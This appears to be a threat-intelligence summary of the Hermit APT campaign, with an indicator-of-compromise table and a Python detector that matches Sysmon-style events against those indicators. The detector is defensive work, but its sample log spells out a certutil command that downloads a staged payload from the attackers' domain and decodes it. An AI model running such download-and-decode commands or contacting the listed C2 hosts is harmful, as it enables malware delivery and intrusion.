Hermit (隐士): APT attack campaign targeting the Korean Peninsula disclosed

2018-12-20 Tencent Hermit: APT attack campaign targeting the Korean Peninsula disclosed

https://s.tencent.com/research/report/613.html


Tencent’s threat-intelligence report disclosed Hermit, a spear-phishing campaign against Korean Peninsula-related targets that the researchers linked to the same organization behind SYSCON/SANNY and KONNI activity. The malicious documents required macro execution and used certutil to download and decode a staged batch script from `filer2.1apps.com`, then selected x86 or x64 CAB payloads containing persistence logic, a UAC-bypass module, encrypted C2 configuration, and the BrowserUpdate.exe backdoor. The core payload decrypted shellcode, reconstructed and loaded a PE file in memory, connected to a C2 server, and supported directory listing, upload, download, file execution, process listing, and process termination. Tencent also described a second-stage hidden TeamViewer variant (`iiexplorer.exe`) used for remote control, linked the codebase to the older Babyface RAT source, and published hashes plus C2 `103.249.31.159:7777`.

Indicators of Compromise

| Type | Value | First Seen | Last Seen |
| --- | --- | --- | --- |
| HASH | a25811b24b7f27a486c05c0a09ad992d | 2018-12-20 | 2019-08-29 |
| IPv4 | 103.249.31.159 | 2018-12-20 | 2019-08-29 |
| HASH | 0eb6090397c74327cd4d47819f724953 | 2018-12-20 | 2019-06-10 |
| HASH | 2bfbf8ce47585aa86b1ab90ff109fd57 | 2018-12-20 | 2019-06-10 |
| DOMAIN | filer2.1apps.com | 2018-12-20 | 2019-06-10 |
| DOMAIN | gmall.com | 2018-09-06 | 2019-06-10 |
| HASH | ff8f9a20c00d9d41836bfa4fac3244a9 | 2018-12-20 | 2018-12-20 |
| HASH | 1dcaf6c62c65b4594a27259bd8bc31ea | 2018-12-20 | 2018-12-20 |
| HASH | 25dd8c4965b09df082968ad4f92ffe5f | 2018-12-20 | 2018-12-20 |
| HASH | 7f7b32771da9760a9e233807196f086d | 2018-12-20 | 2018-12-20 |
| HASH | 7090eb434f228705acd8d2da5e7c7899 | 2018-12-20 | 2018-12-20 |
| HASH | 282f3f17d7d6dc68e220fe328adc66c5 | 2018-12-20 | 2018-12-20 |
| HASH | fcceef71738e1506c4524e3210f4b23d | 2018-12-20 | 2018-12-20 |
| HASH | c9f0125b449dd44d112644901d787e3f | 2018-12-20 | 2018-12-20 |
| HASH | 38b3045a69ff6339adec25822d4d8e25 | 2018-12-20 | 2018-12-20 |
| EMAIL | [email protected] | 2018-12-20 | 2018-12-20 |
| EMAIL | [email protected] | 2018-12-20 | 2018-12-20 |
| URL | http://www.pudn.com/Download/it… | 2018-12-20 | 2018-12-20 |
| URL | http://filer2.1apps.com/1.txt | 2018-12-20 | 2018-12-20 |
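The staging chain in the summary (macro-launched certutil fetching and decoding a script, then a backdoor beaconing to the C2) and the indicators in the table above translate directly into host-based detection logic. The script below is an added example written for this page, not code from Tencent's report: it loads the hashes, domains and C2 endpoint from the table, parses Sysmon-style key=value process-creation and network events, and flags both exact IoC matches and the certutil `-urlcache -f` / `-decode` behaviour regardless of which domain is used. The log format and every sample event are constructed for the example; which hash belongs to which file is not stated on this page, so the pairing of `a25811b24b7f27a486c05c0a09ad992d` with `BrowserUpdate.exe` in the samples is an assumption.

```python
"""Triage Sysmon-style events against the Hermit IoCs and the certutil staging pattern."""
import re

# Indicators copied from the IoC table on this page.
HERMIT_MD5 = {
    "a25811b24b7f27a486c05c0a09ad992d", "0eb6090397c74327cd4d47819f724953",
    "2bfbf8ce47585aa86b1ab90ff109fd57", "ff8f9a20c00d9d41836bfa4fac3244a9",
    "1dcaf6c62c65b4594a27259bd8bc31ea", "25dd8c4965b09df082968ad4f92ffe5f",
    "7f7b32771da9760a9e233807196f086d", "7090eb434f228705acd8d2da5e7c7899",
    "282f3f17d7d6dc68e220fe328adc66c5", "fcceef71738e1506c4524e3210f4b23d",
    "c9f0125b449dd44d112644901d787e3f", "38b3045a69ff6339adec25822d4d8e25",
}
HERMIT_DOMAINS = {"filer2.1apps.com", "gmall.com"}
HERMIT_C2 = {("103.249.31.159", 7777)}

# Behavioural signatures for the staging step the report describes:
# certutil fetching a file (-urlcache -f <url>) and base64-decoding it (-decode).
# These fire on any URL, so a new staging host still gets a medium-severity hit.
CERTUTIL_DOWNLOAD = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b", re.I)
CERTUTIL_DECODE = re.compile(r"\bcertutil(?:\.exe)?\b.*-decode\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s:]+)", re.I)
KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')  # key=value, value optionally double-quoted
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")


def parse_event(line):
    """Parse one key=value event line into a dict; quoted values may contain spaces."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
            for m in KV.finditer(line)}


def check_event(ev):
    """Return a list of (severity, reason) findings for one parsed event."""
    findings = []
    cmd = ev.get("CommandLine", "")
    # Sysmon writes Hashes=MD5=...,SHA256=...; pull out the MD5 part only.
    hashes = dict(p.split("=", 1) for p in ev.get("Hashes", "").split(",") if "=" in p)
    md5 = hashes.get("MD5", "").lower()
    if md5 in HERMIT_MD5:
        findings.append(("high", f"known Hermit sample MD5 {md5}"))
    # Network indicators: the published C2 ip:port and the staging domains.
    dst = (ev.get("DestinationIp"), int(ev.get("DestinationPort", 0)))
    if dst in HERMIT_C2:
        findings.append(("high", f"connection to Hermit C2 {dst[0]}:{dst[1]}"))
    if ev.get("DestinationHostname", "").lower() in HERMIT_DOMAINS:
        findings.append(("high", f"connection to Hermit staging domain {ev['DestinationHostname']}"))
    # Behavioural: certutil as downloader / decoder, high when the host is a known domain.
    if CERTUTIL_DOWNLOAD.search(cmd):
        host = URL_HOST.search(cmd)
        if host and host.group(1).lower() in HERMIT_DOMAINS:
            findings.append(("high", f"certutil download from Hermit domain {host.group(1)}"))
        else:
            findings.append(("medium", "certutil used as a downloader (-urlcache -f)"))
    if CERTUTIL_DECODE.search(cmd):
        findings.append(("medium", "certutil -decode used to unpack a staged file"))
    # A macro-launched chain shows up as an Office process parenting the suspicious one.
    parent = ev.get("ParentImage", "").lower()
    if findings and parent.endswith(OFFICE_PARENTS):
        findings.append(("high", f"spawned by Office process {parent.rsplit(chr(92), 1)[-1]}"))
    return findings


def triage(log_text):
    """Run every non-empty line through check_event; return [(line_no, event, findings)] for hits."""
    hits = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        ev = parse_event(line)
        found = check_event(ev)
        if found:
            hits.append((n, ev, found))
    return hits


# Constructed sample events (not from the report). Paths with spaces are quoted.
SAMPLE_LOG = r'''
EventID=1 Image=C:\Windows\System32\certutil.exe ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" CommandLine="certutil -urlcache -split -f http://filer2.1apps.com/1.txt 1.txt" Hashes=MD5=ffffffffffffffffffffffffffffffff
EventID=1 Image=C:\Windows\System32\certutil.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="certutil -decode 1.txt 1.bat" Hashes=MD5=ffffffffffffffffffffffffffffffff
EventID=1 Image=C:\Users\victim\AppData\Roaming\BrowserUpdate.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="BrowserUpdate.exe" Hashes=MD5=a25811b24b7f27a486c05c0a09ad992d
EventID=3 Image=C:\Users\victim\AppData\Roaming\BrowserUpdate.exe DestinationIp=103.249.31.159 DestinationPort=7777
EventID=1 Image=C:\Windows\System32\certutil.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="certutil -verify cert.cer" Hashes=MD5=ffffffffffffffffffffffffffffffff
EventID=3 Image="C:\Program Files\Mozilla Firefox\firefox.exe" DestinationIp=93.184.216.34 DestinationPort=443
'''

if __name__ == "__main__":
    for line_no, ev, found in triage(SAMPLE_LOG):
        print(f"line {line_no}: {ev.get('Image')}")
        for severity, reason in found:
            print(f"    [{severity}] {reason}")
```

The behavioural rules are what keep the detection useful after the infrastructure in the table is retired: the `-urlcache -f` and `-decode` patterns match the technique, and the Office-parent check raises the severity of any hit that came out of a macro. The legitimate `certutil -verify` and browser-traffic events in the sample produce no findings.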
